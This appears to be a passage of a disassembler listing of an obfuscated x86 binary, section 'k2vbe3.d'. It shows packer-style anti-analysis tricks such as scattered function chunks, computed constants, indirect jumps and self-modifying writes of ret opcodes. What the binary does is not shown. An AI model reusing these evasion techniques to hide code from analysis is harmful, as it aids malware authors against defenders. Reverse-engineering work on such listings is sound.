sub_44A7BB	proc near		; DATA XREF: sub_44DB59+645Bo
		pop	ebp
		retn
sub_44A7BB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44863D

loc_44A7BD:				; CODE XREF: sub_44863D+75CDj
		jmp	loc_448A62
; END OF FUNCTION CHUNK	FOR sub_44863D

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_44A7C2	proc near		; CODE XREF: k2vbe3.d:0043CFDCp
					; k2vbe3.d:0043DD13p ...

var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044220E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00447214 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00449598 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00449B86 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00449D2A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044D031 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044E7C7 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00450CF1 SIZE 00000019 BYTES

		push	ebp
		mov	ebp, esp
		push	ebp
		not	ebp
		jmp	loc_449D2A
sub_44A7C2	endp


; =============== S U B	R O U T	I N E =======================================



sub_44A7CD	proc near		; DATA XREF: sub_458F1C-11C79o

; FUNCTION CHUNK AT 0044CA5E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044F25B SIZE 0000000E BYTES

		xchg	esi, [esp+0]
		call	sub_442D04
		mov	eax, 0A7C2536Ch
		call	sub_4553CC
		mov	ds:off_41E054, eax
		jmp	loc_44CA5E
sub_44A7CD	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D45F

loc_44A7EA:				; CODE XREF: sub_43D45F+7j
		push	ecx
		push	0B8E28AE0h
		pop	ecx
		or	ecx, 42FB4E70h
		add	ecx, 0D309860Ah
		xor	eax, ecx
		call	sub_45BF01

loc_44A804:				; CODE XREF: sub_43CCD0:loc_44B1E8j
		popf
		xchg	eax, [esp-8+arg_4]
		jmp	loc_459A2A
; END OF FUNCTION CHUNK	FOR sub_43D45F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_44A80D:				; CODE XREF: sub_446258:loc_44FC79j
		call	sub_44367E
		push	452911F5h
		pop	eax
		or	eax, ds:4000F1h
		xor	eax, 3CFF815Ah
		jmp	loc_44028B
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------

loc_44A829:				; CODE XREF: k2vbe3.d:0045AD99j
		xor	ebp, esi

loc_44A82B:				; CODE XREF: k2vbe3.d:loc_45AD80j
		add	ecx, 0AE7FE14Ah
		add	ecx, ebp
		add	ecx, 0FFC1C9Dh
		mov	[ecx], eax
		jmp	loc_454918
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B6EC

loc_44A840:				; CODE XREF: sub_44B6EC:loc_444590j
		pop	ebx
		rol	edx, 1Ah
		xor	edx, 0A9ECDFF1h
		add	edx, 51EE6552h
		and	edx, 0DB65B1A2h
		add	edx, 82B73564h
		xor	eax, edx
		xchg	ebp, [esp-4+arg_0]
		jmp	loc_44EF09
; END OF FUNCTION CHUNK	FOR sub_44B6EC
; ---------------------------------------------------------------------------

loc_44A866:				; CODE XREF: k2vbe3.d:00440771j
		test	edx, ecx
		jmp	loc_43CCFB
; ---------------------------------------------------------------------------

locret_44A86D:				; CODE XREF: k2vbe3.d:loc_44EA15j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452092

loc_44A86E:				; CODE XREF: sub_452092-12A0Aj
		jmp	sub_45AA57
; END OF FUNCTION CHUNK	FOR sub_452092
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_44A873:				; CODE XREF: sub_454E69+B86j
		pop	edi
		or	edi, 30931A7h
		xor	edi, 17D929Dh
		xor	eax, edi
		pop	edi
		jmp	loc_441916
; END OF FUNCTION CHUNK	FOR sub_454E69

; =============== S U B	R O U T	I N E =======================================



sub_44A888	proc near		; DATA XREF: k2vbe3.d:00444DC0o

; FUNCTION CHUNK AT 004506AB SIZE 00000005 BYTES

		add	esi, 0F06E43ECh
		xchg	esi, [esp+0]
		jmp	loc_4506AB
sub_44A888	endp

; ---------------------------------------------------------------------------
		mov	edx, [ebx]
		jmp	sub_43DE49
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4402FA

loc_44A89D:				; CODE XREF: sub_4402FA+10639j
		adc	esi, ebx
; END OF FUNCTION CHUNK	FOR sub_4402FA
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_44A89F:				; CODE XREF: sub_45890F:loc_441479j
					; sub_440C94+70DBj ...
		jmp	loc_44FF55
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4402FA

loc_44A8A4:				; CODE XREF: sub_440C94-36F4j
					; sub_4402FA+16345j
		xchg	edx, [esp+0]
		mov	ecx, edx
		pop	edx
		pop	ebp
		retn
; END OF FUNCTION CHUNK	FOR sub_4402FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C7D

loc_44A8AC:				; CODE XREF: sub_440C7D-4FEj
		jmp	sub_454E83
; END OF FUNCTION CHUNK	FOR sub_440C7D

; =============== S U B	R O U T	I N E =======================================



sub_44A8B1	proc near		; CODE XREF: sub_407E67+Ep
					; sub_41A0A7+168p ...
		push	offset sub_45AA0B
		jmp	nullsub_59
sub_44A8B1	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456666

loc_44A8BB:				; CODE XREF: sub_456666:loc_44BE34j
		jnz	loc_44D4E4
		jmp	loc_446ACA
; END OF FUNCTION CHUNK	FOR sub_456666
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4490B2

loc_44A8C6:				; CODE XREF: sub_4490B2+15j
		mov	eax, [esp-8+arg_4]
		push	edx
		push	ecx
		push	0B769BBAAh
		pop	ecx
		jmp	loc_4449D3
; END OF FUNCTION CHUNK	FOR sub_4490B2
; ---------------------------------------------------------------------------
		sbb	esi, 1F7F7E0Bh
		jmp	sub_4420B5
; ---------------------------------------------------------------------------

loc_44A8E1:				; DATA XREF: sub_4505F8:loc_44DF0Co
		call	sub_4436CE
		push	0C332BAADh
		pop	edx
		or	edx, 77E86E2Ch
		add	edx, 610B5374h
		jmp	loc_4475E9

; =============== S U B	R O U T	I N E =======================================



sub_44A8FD	proc near		; CODE XREF: k2vbe3.d:00440F37j
					; k2vbe3.d:00459951p
		xchg	eax, [esp+0]
sub_44A8FD	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_43CCD0

loc_44A900:				; CODE XREF: sub_43CCD0:loc_456BF5j
		pop	eax
		xchg	ebp, [esp+0Ch+var_C]
		mov	eax, ebp
		jmp	loc_4431D6
; END OF FUNCTION CHUNK	FOR sub_43CCD0
; ---------------------------------------------------------------------------

loc_44A90B:				; CODE XREF: k2vbe3.d:004496D8j
		jp	loc_44857E
		xchg	ecx, [esp]
		pop	ecx
		pop	edx
		jz	loc_4449C4
		mov	eax, [esp]
		jmp	loc_43E3E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EEC6

loc_44A924:				; CODE XREF: sub_43EEC6+A507j
		xor	esi, 9FAB8E11h
		adc	ecx, ebp
		jmp	loc_43F6FF
; END OF FUNCTION CHUNK	FOR sub_43EEC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B2D7

loc_44A931:				; CODE XREF: sub_44B2D7-3AD7j
		xchg	eax, edx
		jmp	loc_4593EF
; END OF FUNCTION CHUNK	FOR sub_44B2D7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_44A938:				; CODE XREF: sub_43C3A9:loc_45A0B0j
		sbb	edx, ebx

loc_44A93A:				; CODE XREF: k2vbe3.d:loc_448991j
		push	0B7F4B21Ah
		xchg	ebp, [esp+4+var_4]
		mov	eax, ebp
		pop	ebp
		xor	eax, 59507357h
		sub	eax, 8BF14B3Ah
		jmp	loc_449531
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------

loc_44A956:				; CODE XREF: k2vbe3.d:loc_4428BBj
		cmp	ds:dword_444F20, 0
		jnz	loc_44E846
		push	offset sub_45B041
		jmp	loc_45C0F6
; ---------------------------------------------------------------------------
		xchg	esi, eax
		popf
		jmp	sub_44863D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_44A975:				; CODE XREF: sub_446E24:loc_4574D5j
		jnz	loc_443B4B
		jmp	loc_448AD0
; END OF FUNCTION CHUNK	FOR sub_446E24

; =============== S U B	R O U T	I N E =======================================



sub_44A980	proc near		; CODE XREF: sub_44662B:loc_4595ADj

var_8		= dword	ptr -8
var_4		= dword	ptr -4

; FUNCTION CHUNK AT 0044536E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044C2AF SIZE 00000014 BYTES

		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+4+var_4]

loc_44A986:				; CODE XREF: k2vbe3.d:loc_448B6Aj
		push	ebx
		push	0AD894C10h
		pop	ebx
		jmp	loc_44536E
sub_44A980	endp


; =============== S U B	R O U T	I N E =======================================



sub_44A992	proc near		; DATA XREF: sub_43FF90+3F32o

; FUNCTION CHUNK AT 00447A85 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00453F93 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458825 SIZE 00000018 BYTES

		pushf
		push	1CA47CBBh
		pop	ebx
		and	ebx, 16BCC329h
		rol	ebx, 2
		jmp	loc_458825
sub_44A992	endp

; ---------------------------------------------------------------------------

loc_44A9A7:				; CODE XREF: k2vbe3.d:004461D0j
		popf

loc_44A9A8:				; CODE XREF: k2vbe3.d:004461BDj
		or	eax, ds:4000F2h
		push	offset sub_450064
		jmp	loc_45B0FA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451F91

loc_44A9B8:				; CODE XREF: sub_451F91+Bj
		mov	byte ptr [eax],	0C3h

loc_44A9BB:				; CODE XREF: sub_44945C:loc_449385j
		jmp	loc_443B77
; END OF FUNCTION CHUNK	FOR sub_451F91
; ---------------------------------------------------------------------------

loc_44A9C0:				; CODE XREF: k2vbe3.d:00458A12j
		call	nullsub_9
		jmp	ds:dword_41E0DC
; ---------------------------------------------------------------------------

loc_44A9CB:				; CODE XREF: k2vbe3.d:0044E3C6j
		jmp	loc_449B6F
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_9. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
		jnb	loc_455C02
		jmp	loc_43C2AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442D04

loc_44A9DC:				; CODE XREF: sub_442D04:loc_450E27j
		push	ecx
		call	sub_450B82
; END OF FUNCTION CHUNK	FOR sub_442D04
; START	OF FUNCTION CHUNK FOR sub_447692

loc_44A9E2:				; CODE XREF: sub_447692+100DDj
		jmp	loc_44996D
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44A9E7:				; CODE XREF: sub_45A323-AF4Cj
		jmp	loc_4483B4
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A634

loc_44A9EC:				; CODE XREF: sub_45A634-17A4Bj
		jmp	loc_453E0D
; END OF FUNCTION CHUNK	FOR sub_45A634
; ---------------------------------------------------------------------------

loc_44A9F1:				; DATA XREF: sub_44E481:loc_44F36Eo
		lea	eax, loc_45B014
		mov	byte ptr [eax],	0C3h
		jmp	loc_448033

; =============== S U B	R O U T	I N E =======================================



sub_44A9FF	proc near		; DATA XREF: .data:off_42892Co
		push	offset loc_43F4EE
		jmp	nullsub_60
sub_44A9FF	endp

; ---------------------------------------------------------------------------
		sub	edx, 4378EC69h
		jmp	sub_446382
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_413. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_44AA15:				; CODE XREF: sub_4467A1-74A8j
		jmp	loc_45A4AC
; END OF FUNCTION CHUNK	FOR sub_4467A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426DF

loc_44AA1A:				; CODE XREF: sub_4426DF-3D40j
		jp	loc_4453F2
		shr	edx, 0Bh

loc_44AA23:				; CODE XREF: sub_4426DF:loc_44C326j
		mov	eax, 33F214AFh
		call	sub_4553CC
		add	eax, 0F22A10E6h

loc_44AA33:				; CODE XREF: sub_448B5E-71E9j
		jmp	loc_4471AF
; END OF FUNCTION CHUNK	FOR sub_4426DF
; ---------------------------------------------------------------------------

loc_44AA38:				; CODE XREF: k2vbe3.d:0045B6FDj
		mov	ds:dword_41E0EC, eax
		lea	eax, sub_4559F4
		mov	byte ptr [eax],	0C3h
		jmp	loc_44A2F4
; ---------------------------------------------------------------------------
		call	nullsub_465
		jmp	ds:dword_41E0F0
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4575BD

loc_44AA57:				; CODE XREF: sub_4575BD-133A8j
		jmp	loc_448317
; END OF FUNCTION CHUNK	FOR sub_4575BD
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_465. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		or	al, 24h
		jmp	loc_44D462
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444BC3

loc_44AA64:				; CODE XREF: sub_444BC3+Dj
		ror	eax, 0Dh
		push	offset loc_44EBEF
		jmp	loc_44A4F0
; END OF FUNCTION CHUNK	FOR sub_444BC3

; =============== S U B	R O U T	I N E =======================================



sub_44AA71	proc near		; DATA XREF: sub_4526F4:loc_43E032o
		pop	edx
		push	offset loc_450698
		jmp	nullsub_128
sub_44AA71	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_511. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

loc_44AA7D:				; DATA XREF: sub_4508A3:loc_4566EEo
		xor	eax, eax
		mov	[ebp-8], eax
; START	OF FUNCTION CHUNK FOR sub_447C43

loc_44AA82:				; CODE XREF: k2vbe3.d:0043D716j
					; sub_447C43+8j
		js	loc_4433FE
		push	5C481039h
		jmp	loc_446541
; END OF FUNCTION CHUNK	FOR sub_447C43

; =============== S U B	R O U T	I N E =======================================



sub_44AA92	proc near		; CODE XREF: k2vbe3.d:00441AC4j
					; k2vbe3.d:004520D3p ...
		xchg	edi, [esp+0]
		pop	edi
		call	nullsub_18
		jmp	ds:dword_41E18C
sub_44AA92	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B94B

loc_44AAA1:				; CODE XREF: sub_44B94B-41ACj
		sbb	ecx, eax
		ror	edi, 4
		xchg	esi, edi

loc_44AAA8:				; CODE XREF: k2vbe3.d:loc_45A57Dj
		call	sub_4436CE
		call	sub_448159

loc_44AAB2:				; DATA XREF: sub_43F888+11o
		push	ecx
		mov	ecx, eax
		xchg	ecx, [esp+0]
		push	offset sub_44E971
		jmp	nullsub_192
; END OF FUNCTION CHUNK	FOR sub_44B94B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4408BD

loc_44AAC2:				; CODE XREF: sub_4408BD:loc_44FE52j
		pop	ebx
		and	ebx, 1EA5AF8h
		xor	ebx, ds:4000E9h
; END OF FUNCTION CHUNK	FOR sub_4408BD
; START	OF FUNCTION CHUNK FOR sub_446E24

loc_44AACF:				; CODE XREF: sub_446E24:loc_44A774j
		test	ebx, 400h
		jmp	loc_45AA4C
; END OF FUNCTION CHUNK	FOR sub_446E24
; ---------------------------------------------------------------------------

locret_44AADA:				; CODE XREF: k2vbe3.d:0045A13Dj
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F34C

loc_44AADB:				; CODE XREF: sub_43F34C+EBA3j
		shr	ebx, 13h
		or	ecx, esi
		jmp	loc_454501
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458B9B

loc_44AAE5:				; CODE XREF: sub_458B9B:loc_441219j
		jnz	loc_43DA62
		jmp	loc_45610D
; END OF FUNCTION CHUNK	FOR sub_458B9B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_44AAF0:				; CODE XREF: sub_454AD4:loc_448E51j
		adc	ebx, eax
		jg	loc_452381
		shl	ecx, 1Ah
		cmp	ecx, eax
		jmp	loc_4430A9
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------

loc_44AB02:				; CODE XREF: k2vbe3.d:0045AACEj
		jo	loc_451F23

; =============== S U B	R O U T	I N E =======================================



sub_44AB08	proc near		; CODE XREF: k2vbe3.d:00446EE9p
		xchg	edi, [esp+0]
		pop	edi
		call	nullsub_520
		jmp	ds:dword_41E0A0
sub_44AB08	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44AB17:				; CODE XREF: k2vbe3.d:004533FDj
		jmp	loc_450C9F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C46F

loc_44AB1C:				; CODE XREF: sub_44C46F+1Cj
		jmp	loc_452C10
; END OF FUNCTION CHUNK	FOR sub_44C46F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44662B

loc_44AB21:				; CODE XREF: sub_44662B:loc_44124Dj
					; k2vbe3.d:0044228Cj
		jmp	loc_43CBCC
; END OF FUNCTION CHUNK	FOR sub_44662B
; ---------------------------------------------------------------------------

loc_44AB26:				; CODE XREF: k2vbe3.d:0043CE9Aj
		jmp	loc_44FB6C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444EFA

loc_44AB2B:				; CODE XREF: sub_444EFA:loc_43CD0Cj
		jnz	loc_459337
		jmp	loc_44ECEE
; END OF FUNCTION CHUNK	FOR sub_444EFA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E90D

loc_44AB36:				; CODE XREF: sub_44E90D:loc_454CB7j
		jz	loc_45412F
		jmp	loc_44DDFF
; END OF FUNCTION CHUNK	FOR sub_44E90D
; ---------------------------------------------------------------------------
		add	eax, ebx
		jmp	sub_45496E
; ---------------------------------------------------------------------------
		sbb	ecx, 0ED701361h
		jmp	sub_458B89
; ---------------------------------------------------------------------------

loc_44AB53:				; CODE XREF: k2vbe3.d:loc_44DB13j
		pushf
		cdq
		jmp	loc_457EAB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457580

loc_44AB5A:				; CODE XREF: sub_457580:loc_45720Cj
		and	ebp, ebx
		jmp	loc_442DCF
; END OF FUNCTION CHUNK	FOR sub_457580
; ---------------------------------------------------------------------------

loc_44AB61:				; CODE XREF: k2vbe3.d:loc_459C23j
		xchg	ebx, [esp]
		push	48546DC1h
		xchg	ebx, [esp]
		mov	ecx, ebx

loc_44AB6E:				; CODE XREF: k2vbe3.d:loc_44022Aj
		jmp	loc_4477E4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4539B3

loc_44AB73:				; CODE XREF: sub_4539B3+1Aj
		jz	loc_43D9AF
		jmp	loc_452AD4
; END OF FUNCTION CHUNK	FOR sub_4539B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_44AB7E:				; CODE XREF: sub_443FC1:loc_43DAF7j
		sub	eax, 30193996h
		xor	eax, 0B96B4D8Dh
		push	ebx
		pushf
		push	9BC8A564h
		jmp	loc_459238
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4545C4

loc_44AB96:				; CODE XREF: sub_4545C4+71EFj
		or	edx, 8D37AFEh
		add	edx, 6649E545h
		mov	[edx], eax
		pop	edx
		lea	eax, sub_4545C4
		jmp	loc_459585
; END OF FUNCTION CHUNK	FOR sub_4545C4
; ---------------------------------------------------------------------------
		test	esi, 0A9AFCE6Fh
		jmp	loc_441BEE

; =============== S U B	R O U T	I N E =======================================



sub_44ABBB	proc near		; CODE XREF: sub_454516j
					; DATA XREF: sub_454E83:loc_45450Co
		sub	al, 99h
		call	sub_44083C
sub_44ABBB	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_443FC1

loc_44ABC2:				; CODE XREF: sub_443FC1:loc_455284j
					; k2vbe3.d:004581F0j
		jmp	loc_443257
; END OF FUNCTION CHUNK	FOR sub_443FC1
; ---------------------------------------------------------------------------

loc_44ABC7:				; CODE XREF: k2vbe3.d:00451143j
		jmp	sub_44F49C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454AD4

loc_44ABCC:				; CODE XREF: sub_454AD4-B738j
		xor	edx, 1C93D2D8h
		or	edx, 0BAE45BF9h
		rol	edx, 14h
		add	edx, 81F1E7h
		mov	[edx], eax
		pop	edx
		jmp	loc_441E23
; END OF FUNCTION CHUNK	FOR sub_454AD4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4481FA

loc_44ABE9:				; CODE XREF: sub_4481FA:loc_447261j
		add	eax, 19DEA907h
		mov	ds:dword_44FFFC, eax

loc_44ABF5:				; CODE XREF: sub_4481FA:loc_44E985j
					; sub_44B8EF+7847j
		add	eax, 0E62156F9h
		ror	eax, 2
		jmp	loc_451E3C
; END OF FUNCTION CHUNK	FOR sub_4481FA
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_525. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4580DF

loc_44AC04:				; CODE XREF: sub_4580DF-5EE3j
		jmp	loc_44BD75
; END OF FUNCTION CHUNK	FOR sub_4580DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A306

loc_44AC09:				; CODE XREF: sub_44A306-1894j
		jmp	nullsub_385
; END OF FUNCTION CHUNK	FOR sub_44A306
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_447692

loc_44AC0E:				; CODE XREF: sub_447692-49CEj
		jmp	sub_451759
; END OF FUNCTION CHUNK	FOR sub_447692
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453AE8

loc_44AC13:				; CODE XREF: sub_453AE8-173B5j
		jmp	loc_45534E
; END OF FUNCTION CHUNK	FOR sub_453AE8
; ---------------------------------------------------------------------------

loc_44AC18:				; CODE XREF: k2vbe3.d:loc_453019j
		jnz	loc_4460AC
		jmp	loc_44A266
; ---------------------------------------------------------------------------

loc_44AC23:				; DATA XREF: sub_44A1FD+6o
		push	ecx
		push	0DC2CD1B4h
		pop	ecx
		add	ecx, 0F57320EBh
		jmp	loc_45B449
; ---------------------------------------------------------------------------
		mov	eax, 0B4B93D2h
		push	offset loc_44861E
		jmp	locret_4545E9
; ---------------------------------------------------------------------------

loc_44AC44:				; CODE XREF: k2vbe3.d:0044E19Aj
		xor	esi, ebp
		adc	ebp, edx
		xchg	edi, ecx
		sbb	ebx, eax

loc_44AC4C:				; CODE XREF: k2vbe3.d:0043CC1Dj
		xor	edx, 0D0F0014Eh
		sub	edx, 86A4C1D9h
		jmp	loc_44119A
; ---------------------------------------------------------------------------

loc_44AC5D:				; DATA XREF: sub_458019:loc_442CD7o
		push	5643C1B5h
		pop	eax
		and	eax, 859BAD28h
		add	eax, 0F7C3F2E0h
		jmp	loc_43DA6F
; ---------------------------------------------------------------------------
		jmp	ds:off_41E064
; ---------------------------------------------------------------------------

loc_44AC7A:				; CODE XREF: k2vbe3.d:0044653Cj
		jmp	loc_43D1BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_44AC7F:				; CODE XREF: sub_440C94:loc_451956j
					; sub_45A323+D8j ...
		xchg	esi, [esp+8+var_8]
		mov	edx, esi
		pop	esi
		jns	loc_45B72A
		mov	eax, [esp+4+var_4]

loc_44AC8E:				; CODE XREF: k2vbe3.d:loc_4518A0j
		push	offset sub_449788
		jmp	nullsub_373
; ---------------------------------------------------------------------------

loc_44AC98:				; CODE XREF: sub_45A323-4854j
		pushf

loc_44AC99:				; CODE XREF: sub_45A323:loc_45A400j
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_451F5C
		jmp	loc_44CA15
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45C041

loc_44ACAA:				; CODE XREF: sub_45C041:loc_4506BEj
		mov	edx, 4231CF6h
		jmp	loc_455064
; END OF FUNCTION CHUNK	FOR sub_45C041
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446258

loc_44ACB4:				; CODE XREF: sub_446258:loc_450332j
		cmp	edx, edi
		jmp	loc_45B072
; END OF FUNCTION CHUNK	FOR sub_446258
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CE6

loc_44ACBB:				; CODE XREF: k2vbe3.d:loc_43FADCj
					; sub_446CE6-4F3Cj
		sub	esi, 6EFE7629h
		test	esi, 2000000h
		jmp	loc_43C9D0
; END OF FUNCTION CHUNK	FOR sub_446CE6
; ---------------------------------------------------------------------------

loc_44ACCC:				; CODE XREF: k2vbe3.d:0044846Dj
		jno	loc_457589

loc_44ACD2:				; CODE XREF: k2vbe3.d:loc_44396Bj
		push	offset loc_45B623
		jmp	locret_452A14
; ---------------------------------------------------------------------------

loc_44ACDC:				; DATA XREF: sub_456706-127B5o
		push	ecx
		pushf
		push	0B60D8760h
		pop	ecx
		xor	ecx, 237D40DFh
		add	ecx, 0FD383C95h
		or	ecx, 1AA1B40Ch
		add	ecx, 65564BB4h
		jmp	loc_44BA23
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F364

loc_44AD01:				; CODE XREF: sub_43F364+11BFBj
		mov	eax, edx
		push	esi
		push	0B908A150h
		pop	esi
		rol	esi, 1Eh
		add	esi, 0D2032FB7h
		jmp	loc_43E269
; END OF FUNCTION CHUNK	FOR sub_43F364
; ---------------------------------------------------------------------------

loc_44AD18:				; CODE XREF: k2vbe3.d:0044DFA8j
		js	loc_457E84

; =============== S U B	R O U T	I N E =======================================



sub_44AD1E	proc near		; CODE XREF: sub_43DEBE:loc_453EBBp

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00455EDE SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		add	ebx, 0B4B7FD38h
		xchg	ebx, [esp-4+arg_0]
		jmp	loc_455EDE
sub_44AD1E	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44AD30	proc near		; DATA XREF: sub_449995+16o
		mov	[ecx], eax
		xchg	esi, [esp+0]
		mov	ecx, esi
		pop	esi
sub_44AD30	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_44D9A7

loc_44AD38:				; CODE XREF: sub_44D9A7-238Bj
		push	edx
		jmp	loc_455526
; END OF FUNCTION CHUNK	FOR sub_44D9A7
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_39. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441D41

loc_44AD3F:				; CODE XREF: sub_441D41+19F2Dj
		jmp	loc_44F500
; END OF FUNCTION CHUNK	FOR sub_441D41

; =============== S U B	R O U T	I N E =======================================



sub_44AD44	proc near		; CODE XREF: k2vbe3.d:0043D1D0j
					; sub_44660F:loc_44FBD5p

; FUNCTION CHUNK AT 0043E0C8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043F267 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CDBF SIZE 0000000A BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	ecx
		mov	esp, ebp
		pop	ebp
		mov	eax, ds:dword_43FA70
		jmp	loc_43F267
sub_44AD44	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_274. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451EEA

loc_44AD58:				; CODE XREF: sub_451EEA-6F63j
		jl	loc_45252F
		jmp	loc_43E8D3
; END OF FUNCTION CHUNK	FOR sub_451EEA
; ---------------------------------------------------------------------------

loc_44AD63:				; CODE XREF: k2vbe3.d:0043E5E7j
		mov	eax, edi

; =============== S U B	R O U T	I N E =======================================



sub_44AD65	proc near		; CODE XREF: k2vbe3.d:00446C92p
		xchg	edi, [esp+0]
		pop	edi
		lea	eax, loc_45A8FB
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A8FB
sub_44AD65	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44AD77	proc near		; CODE XREF: sub_414D0E+1Cp
					; sub_41BF50+161p ...
		call	sub_452ECC
		jmp	ds:off_41E090
sub_44AD77	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CCF

loc_44AD82:				; CODE XREF: sub_446CCF+6930j
		jmp	loc_45A65F
; END OF FUNCTION CHUNK	FOR sub_446CCF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44A0D7

